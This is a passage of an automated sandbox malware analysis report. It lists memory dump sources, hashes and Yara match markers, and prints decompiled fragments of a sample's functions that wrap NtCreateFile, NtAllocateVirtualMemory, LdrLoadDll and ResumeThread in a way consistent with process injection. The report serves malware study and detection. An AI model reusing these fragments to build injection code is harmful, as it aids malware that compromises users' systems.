                                                      • Opcode Fuzzy Hash: 1f3644f5fa8d6acec830442c8c47a41f7764d1fa69a9e5fdc0d40e528e6cbe63
                                                      • Instruction Fuzzy Hash: 0C41CCB4D102189FCB10CFA9D884AEEFBB1BF49314F24842AE814B7240D778A949CF64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • ResumeThread.KERNELBASE(?), ref: 0025BAC6
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.478069581.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: b413ed1ecdf107ef47bd728dd32040cb5b5659edfc7656b5bf11738136e998a1
                                                      • Instruction ID: 56ad37d354ac726dcdb3d35ae99661e135ea2d3447348cc2fb5c4d841ab12902
                                                      • Opcode Fuzzy Hash: b413ed1ecdf107ef47bd728dd32040cb5b5659edfc7656b5bf11738136e998a1
                                                      • Instruction Fuzzy Hash: 7831B9B4D042189FCF14CFA9E884AAEFBB5BF49314F14942AE815B7300D775A905CFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.478045378.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bc872d69ff4aa0093bba98ba36493c5c6e37a8a2d7fa2850282ab73a0770dfa4
                                                      • Instruction ID: 3d918b142f2c872d3761e6215313ad9b4c4615093fa310acc8c095cf5c6441c5
                                                      • Opcode Fuzzy Hash: bc872d69ff4aa0093bba98ba36493c5c6e37a8a2d7fa2850282ab73a0770dfa4
                                                      • Instruction Fuzzy Hash: 4621F271608248EFDB05DF14E980B2ABBB1FF88314F24C6A9E90D5B246C736D807CA61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.478045378.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 88ae055e37acc7caf6c43a92195ee578870144ecc40bf7a1d6f08f857d602543
                                                      • Instruction ID: 949054c66b3c022d8a67b5653294cc8c7cb2935169906b5f9f8aad65d4954267
                                                      • Opcode Fuzzy Hash: 88ae055e37acc7caf6c43a92195ee578870144ecc40bf7a1d6f08f857d602543
                                                      • Instruction Fuzzy Hash: 3B21F275608248DFCB14DF14E884B2ABB71EF88314F34C569E90D4B246C736D847CB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.478045378.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: faa96cf0f6e996c19eca2ce5ed6362864ad49ad4db955588aa39112c0c3a4192
                                                      • Instruction ID: 5a283bd1473881619eeda958203450e179181e0c35ea4cb785e9870bba71357e
                                                      • Opcode Fuzzy Hash: faa96cf0f6e996c19eca2ce5ed6362864ad49ad4db955588aa39112c0c3a4192
                                                      • Instruction Fuzzy Hash: CA215E755093848FCB12CF24D994B15BF71EF46314F28C5EAD8498B6A7C33A984ACB62
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.478045378.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a5ee6843a4e9cfea22ba18c3e907f7f3e835d62cdaa316c125774669d82f80da
                                                      • Instruction ID: 63bb12b906815e47b78eaf3f5f8095fa320b1a16b69d618b529de92af085efd9
                                                      • Opcode Fuzzy Hash: a5ee6843a4e9cfea22ba18c3e907f7f3e835d62cdaa316c125774669d82f80da
                                                      • Instruction Fuzzy Hash: 87118B75544284DFCB16CF10E5C4B15BFB1FF85314F28C6A9D8494B656C33AD84ACB62
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.478034909.000000000016D000.00000040.00000001.sdmp, Offset: 0016D000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a9ed97e8d6b3eaa2ee02e8c1a9e0f03c90a3dfbc1d13188769312167f7a04a07
                                                      • Instruction ID: 34c26859fc86342d4ae07b0640dd64adeadc98f7fe6c87d90f12eab6f66723aa
                                                      • Opcode Fuzzy Hash: a9ed97e8d6b3eaa2ee02e8c1a9e0f03c90a3dfbc1d13188769312167f7a04a07
                                                      • Instruction Fuzzy Hash: 2901A7319087449ADB508A26EC84B6BBBD8EF51724F15C45EEE045B182D374DC45C6B1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.478034909.000000000016D000.00000040.00000001.sdmp, Offset: 0016D000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.478069581.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.478069581.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.478069581.0000000000250000.00000040.00000001.sdmp, Offset: 00250000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Executed Functions

                                                      C-Code - Quality: 37%
                                                      			E00418660(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                                      				void* _t18;
                                                      				void* _t27;
                                                      				intOrPtr* _t28;
                                                      
                                                      				_t13 = _a4;
                                                      				_t28 = _a4 + 0xc48;
                                                      				E004191B0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                      				_t4 =  &_a40; // 0x413a21
                                                      				_t6 =  &_a32; // 0x413d62
                                                      				_t12 =  &_a8; // 0x413d62
                                                      				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                                                      				return _t18;
                                                      			}







                                                      APIs
                                                      • NtReadFile.NTDLL(b=A,5E972F65,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F65,00413D62,?,00000000), ref: 004186A5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID: !:A$b=A$b=A
                                                      • API String ID: 2738559852-704622139
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00409B30(void* __eflags, void* _a4, intOrPtr _a8) {
                                                      				char* _v8;
                                                      				struct _EXCEPTION_RECORD _v12;
                                                      				struct _OBJDIR_INFORMATION _v16;
                                                      				char _v536;
                                                      				void* _t15;
                                                      				struct _OBJDIR_INFORMATION _t17;
                                                      				struct _OBJDIR_INFORMATION _t18;
                                                      				void* _t30;
                                                      				void* _t31;
                                                      				void* _t32;
                                                      
                                                      				_v8 =  &_v536;
                                                      				_t15 = E0041AF40( &_v12, 0x104, _a8);
                                                      				_t31 = _t30 + 0xc;
                                                      				if(_t15 != 0) {
                                                      					_t17 = E0041B360(__eflags, _v8);
                                                      					_t32 = _t31 + 4;
                                                      					__eflags = _t17;
                                                      					if(_t17 != 0) {
                                                      						E0041B5E0( &_v12, 0);
                                                      						_t32 = _t32 + 8;
                                                      					}
                                                      					_t18 = E004196F0(_v8);
                                                      					_v16 = _t18;
                                                      					__eflags = _t18;
                                                      					if(_t18 == 0) {
                                                      						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                      						return _v16;
                                                      					}
                                                      					return _t18;
                                                      				} else {
                                                      					return _t15;
                                                      				}
                                                      			}














                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 79%
                                                      			E004185AA(void* __edi, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                      				long _t23;
                                                      
                                                      				asm("aaa");
                                                      				_t17 = _a4;
                                                      				_t4 = _t17 + 0xc40; // 0xc40
                                                      				E004191B0(__edi, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                      				_t23 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                      				return _t23;
                                                      			}





                                                      APIs
                                                      • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 004185FD
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E004185B0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                      				long _t21;
                                                      				void* _t31;
                                                      
                                                      				_t3 = _a4 + 0xc40; // 0xc40
                                                      				E004191B0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                      				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                      				return _t21;
                                                      			}






                                                      APIs
                                                      • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 004185FD
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 37%
                                                      			E0041878A(intOrPtr _a8, void* _a12, PVOID* _a16, long _a20, long* _a24, long _a28, long _a32) {
                                                      				long _t14;
                                                      				void* _t21;
                                                      
                                                      				asm("aad 0x9d");
                                                      				asm("daa");
                                                      				asm("salc");
                                                      				_pop(ss);
                                                      				asm("ficom dword [ebp-0x75]");
                                                      				_t10 = _a8;
                                                      				_t3 = _t10 + 0xc60; // 0xca0
                                                      				E004191B0(_t21, _a8, _t3,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x30);
                                                      				_t14 = NtAllocateVirtualMemory(_a12, _a16, _a20, _a24, _a28, _a32); // executed
                                                      				return _t14;
                                                      			}






                                                      APIs
                                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00419384,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187C9
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 85%
                                                      			E004186DA(void* __edx, void* __eflags, long _a4, void* _a8) {
                                                      				intOrPtr _v117;
                                                      				long* __esi;
                                                      				signed char _t6;
                                                      				void* _t11;
                                                      
                                                      				asm("int 0xe7");
                                                      				asm("std");
                                                      				if(__eflags < 0) {
                                                      					return  *(_t6 | 0x0000008b)(__edx, es, _t11);
                                                      				} else {
                                                      					__eflags = __edx - _v117;
                                                      					__ebp = __esp;
                                                      					__eax = _a4;
                                                      					_t3 = __eax + 0x10; // 0x300
                                                      					_t4 = __eax + 0xc50; // 0x409753
                                                      					__esi = _t4;
                                                      					__eax = E004191B0(__edi, _a4, __esi,  *_t3, 0, 0x2c);
                                                      					__edx = _a8;
                                                      					__eax =  *__esi;
                                                      					__eax = NtClose(_a8); // executed
                                                      					__esi = __esi;
                                                      					__ebp = __ebp;
                                                      					return __eax;
                                                      				}
                                                      			}








                                                      APIs
                                                      • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418705
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00418790(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                      				long _t14;
                                                      				void* _t21;
                                                      
                                                      				_t3 = _a4 + 0xc60; // 0xca0
                                                      				E004191B0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                      				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                      				return _t14;
                                                      			}






                                                      APIs
                                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00419384,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187C9
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E004186E0(intOrPtr _a4, void* _a8) {
                                                      				long _t8;
                                                      				void* _t11;
                                                      
                                                      				_t5 = _a4;
                                                      				_t2 = _t5 + 0x10; // 0x300
                                                      				_t3 = _t5 + 0xc50; // 0x409753
                                                      				E004191B0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                      				_t8 = NtClose(_a8); // executed
                                                      				return _t8;
                                                      			}






                                                      APIs
                                                      • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418705
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                      • Instruction ID: cde372c9834ecde76929cfdbc6e84a5308d085747d856cc7173a1988eed98478
                                                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                      • Instruction Fuzzy Hash: 23D012752002147BD710EB99CC45ED7776DEF44750F154459BA195B242C530F94086E4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true
                                                      • Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                      • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                      • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                      • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true
                                                      • Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                      • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                      • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                      • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true
                                                      • Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                      • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                      • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                      • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true
                                                      • Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                      • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                      • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                      • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true
                                                      • Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                      • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                      • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                      • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true
                                                      • Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                      • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                      • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                      • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true
                                                      • Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                      • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                      • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                      • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true
                                                      • Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                      • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                      • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                      • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true
                                                      • Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                      • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                      • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                      • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.541244971.0000000000870000.00000040.00000001.sdmp, Offset: 00860000, based on PE: true
                                                      • Associated: 00000005.00000002.541237168.0000000000860000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541326391.0000000000950000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541405998.0000000000960000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541418960.0000000000964000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541427015.0000000000967000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541434949.0000000000970000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.541476843.00000000009D0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
